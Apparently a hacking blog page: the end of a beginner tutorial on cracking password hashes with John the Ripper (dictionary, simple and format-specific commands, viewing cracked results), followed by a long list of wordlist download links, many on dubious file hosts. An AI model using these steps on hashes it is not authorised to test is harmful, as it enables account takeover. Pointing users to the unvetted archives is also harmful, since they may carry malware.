Now when passwords get long even this method can be a long task. So another type of attack you can do is called a dictionary attack. What a dictionary attack does is it takes a wordlist (a text document full of words, be it an actual dictionary or more) and checks each word in that list until it finds a match. This is a much faster way that the bruteforcing methods above. However, the only way this type of attack will work is if the decrypted hash is among the words in the wordlist. For this example the wordlist I will use will be called "wordlist.txt". To do a dictionary attack, type in this command: john -w:wordlist.txt hash.txt

When John the Ripper is done cracking the password and comes back with an answer it will display the password on screen (at least it does for me). However, if it doesn't(or if you want to go back and look at it in the future) there are two ways you can view the password. One is using the command "john -show hash.txt" which will display the cracked hash on screen and the other is "john.pot" (or you can manually open it from the run folder) which will open up a powerpoint document and have the passes display on it.

-Simple Attack-

I'm not entirely sure what simple attack does so someone can correct me if I'm wrong. Through using it, it seems to me that simple attack will take your username in the hash (in mine it's "shape" remember) and only run a bruteforce using that word and add a little to it. For example it will try shape with numbers and symbols after it like shape1. It will also try the options by adding an uppercase to the first letter so it will check things like this Shape43. It appears that it will try all numbers up to 200 after the word as I tried shape320 and it would not crack it and it shows shape200 when it stops trying. It will not try for example sHapE3 though, only check the first letter with uppercase not all the letters. This should give you a basic idea of what it can do. It might be able to do more but I haven't played around with it to figure more out. Feel free to do this on your own though.

-Additional Notes-

If you get an error saying "No hash loaded" there could be a couple reasons for this. One is that the hash you entered and saved is not recognized as being a hash and you should check to make sure you copied things right. Two is that the hash has previously been cracked and you can check the john.pot file to see if it has.

Also when your doing your attacks if you want to get the answer saved to a file, you can type "> something.txt" after the command and it will save it to that text file in the "run" folder. So a full dictionary attack example would look like this: john -w:wordlist.txt hash.txt > cracked.txt

One more thing. If you didn't notice me saying it above, the quotes("...") above any of the commands above


-The "format" option attack-

Now everything I have demonstrated up until now are attacks on a DES hash. So you might be asking yourself, "Is this all John the Ripper can crack?". Well the answer to that question is no. It is capable of cracking such hashes as BSDI, MD5, BF, AFS, LM. The command you are going to use for this attack looks like this: john -format:hashtype hash.txt

So DES looks like this: john -format:des hash.txt
And MD5 looks like this: john -format:md5 hash.txt
etc

---Conclusion---

Well this is the end of this article but don't think that this is all that John the Ripper can do because there is a lot more. These are just some of the basics and I'll leave you to figure out the rest on your own so play around with it and experiment. I hope this was a fairly good article and is able to help some people out. If anyone has any problems or questions, feel free to pm me and I will help you out if I can. I may return and add in more information if I feel like it. Also if I have any incorrect information you can pm me and I will correct it.

---Extra Resources---

I've decided to throw in something extra that may be helpful to some people.

For people who are looking for word lists, here is a great collection of links: 
http://hackingspecialist.blogspot.com/2012/08/wordlist-thread-keep-adding.html

Here is the official documentation for John the Ripper and should be a good resource for going further into using the program: 
http://www.openwall.com/john/doc/
Posted by at No comments:

Wordlist Thread Keep Adding

Word lists :

http://advlamer.narod.ru

http://www.insidepro.com/rus/download.shtml

http://www.passwords.ru/dic.htm

http://www.outpost9.com/files/WordLists.html

http://www.phreak.com/html/wordlists.shtml

http://www.hackemate.com.ar/wordlists/

http://gdataonline.com/downloads/

http://void.cyberpunk.ru/wordlist/

http://icqinfo.ru/soft_brute.shtml

http://www.acolytez.com/dict/

ftp://ftp.cerias.purdue.edu/pub/dict/

Mirror:
ftp://ftp.funet.fi/pub/unix/security/dictionaries/
ftp://coast.cs.purdue.edu/pub/dict/wordlists/
ftp://ftp.openwall.com/pub/wordlists/
ftp://ftp.ox.ac.uk/pub/wordlists/
ftp://ftp.sil.org/pub/data/span-lex.zip
Other:
http://someshit.net/files/g0df4th4r_g0ld_dic_2032348w0rds.zip
http://someshit.net/files/wordlist.zip
http://zloy.org/downloads/zloy_pass_nick.zip
http://www.iseekyou.ru/forum/index.php?showtopic=62&mode=threaded
http://neworder.box.sk/link.php?currentgrp=38610
http://advlamer.narod.ru/dprogs/sort_file.rar
http://advlamer.narod.ru/dprogs/glueandsort.rar
http://advlamer.narod.ru/dprogs/glue_files.rar
http://advlamer.narod.ru/mprogs/text_parser.rar
http://advlamer.narod.ru/dprogs/dict_cut.rar
http://advlamer.narod.ru/dprogs/multi_dict.rar
http://www.theargon.com/achilles/wordlists/
http://www.uinc.ru/forum/faqs/wordlist.shtml

http://www.sil.org/linguistics/wordlists/english/wordlist/wordsEn.txt
http://sites.rapidus.net/jhuriaux/vpq19000.txt
http://underground54.serveurperso.com/telecharger/dico/

http://www.megaupload.com/?d=66IX1R04
http://www.megaupload.com/it/?d=F929X272
http://www.megaupload.com/?d=0HYO9XP2
http://www.megaupload.com/?d=4PVFCC7C

http://www.dcs.shef.ac.uk/research/ilash/Moby/
http://www.cs.princeton.edu/introcs/datafiles/wordlist.txt
http://www.cs.princeton.edu/introcs/datafiles/words.txt
http://spacebar.org/ifcd/wordlist.txt
http://cd.textfiles.com/suzybatari2/wordwork/dicwords/wordlist.txt
http://labs.mininova.org/wordmatch/wordlist.txt
http://bellsouthpwp.net/u/t/uttie/wordlist.txt
http://people.cs.uchicago.edu/~robby/courses/22001-2004-spring/yawl-word.list
http://pragdave.pragprog.com/data/wordlist.txt
http://www.doz.org.uk/Science/wordlist.txt
http://vburton.ncsa.uiuc.edu/wordlist.txt
http://www.ics.uci.edu/~kay/wordlist.txt
http://www.inf.unideb.hu/~jeszy/download/mestint/wordlist.txt
http://www.opends.org/source/raw/trunk/opends/resource/config/wordlist.txt
http://www.lionelbiggins.com/examples/Wordlist.txt
http://www.sslmit.unibo.it/~dsmiraglio/wordlist/
http://www.informatik.uni-leipzig.de/~duc/software/misc/vn_words.zip
http://www.cis.hut.fi/morphochallenge2007/data/
http://wordlist.sf.cz/
http://john.cs.olemiss.edu/~sbs/download/cs517_NLP/wordlist/
http://void.cyberpunk.ru/wordlist/
http://www.opensource.apple.com/darwinsource/Current/BerkeleyDB-12/db/test/wordlist
http://potm.tripod.com/BOGGLE/wordlist.txt
http://people.debian.org/~ericvb/speeches/regexp/wordlist.txt
http://coyotecult.com/tools/files/wordlist.txt
http://aima.eecs.berkeley.edu/data/wordlist
http://andre.facadecomputer.com/ghost/WORDLIST.TXT
http://aurora.rg.iupui.edu/~schadow/dbm-java/db-2.4.14/test/wordlist
http://www.ics.uci.edu/~jfurlong/ics23/wordlist.txt
http://www.searchcrazy.cn/WordList/WordList_GRE.txt
http://www.cs.bilkent.edu.tr/~ccelik/cs111/WordList.txt
http://www.lostboxen.net/warglue/contests/defcon11-wardrive/resources/stefan-wordlist.txt
http://broncgeeks.billings.k12.mt.us/vlong/php-projects/hangperson/wordlist.txt
http://marc13.narod.ru/bit/wordlist.txt
http://concept.temple.edu/sysadmin/227million--mega_dic.zip -- ~ 2Gb

http://rapidshare.com/files/48467405/dates.rar (словарь дат 1.01.1900 - 31.12.1999, 16kb)
http://rapidshare.com/files/48743054/combined.rar
http://mazahaka-89.narod.ru/Web_mazahaka89/articles/12345_ili_paroli_kotorie_my_vybiraem.htm
http://www.rapidshare.ru/381482
http://www.dbslovar.h.com.ua/russ_pass.txt
http://www.dbslovar.h.com.ua/eng_pass.txt

ftp://ftp.ox.ac.uk/pub/wordlists/
ftp://ftp.openwall.com/pub/wordlists/
ftp://ftp.zedz.net/pub/crypto/wordlists/
ftp://ftp.cerias.purdue.edu/pub/dict/
http://www.outpost9.com/files/WordLists.html
http://packetstormsecurity.org/Crackers/wordlists/
http://theargon.com/achilles/wordlists/
https://www.totse.com/en/hack/word_lists/index.html
https://www.securinfos.info/wordlists_dictionnaires.php
http://www.leetupload.com/dbindex2/index.php?dir=Word%20Lists/

http://www.linuxkungfu.org/files/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.ihteam.net/tools/wordlist.rar
http://whacking.narod.ru/mat_rug_brut.txt
Posted by at No comments:
Subscribe to: Posts (Atom)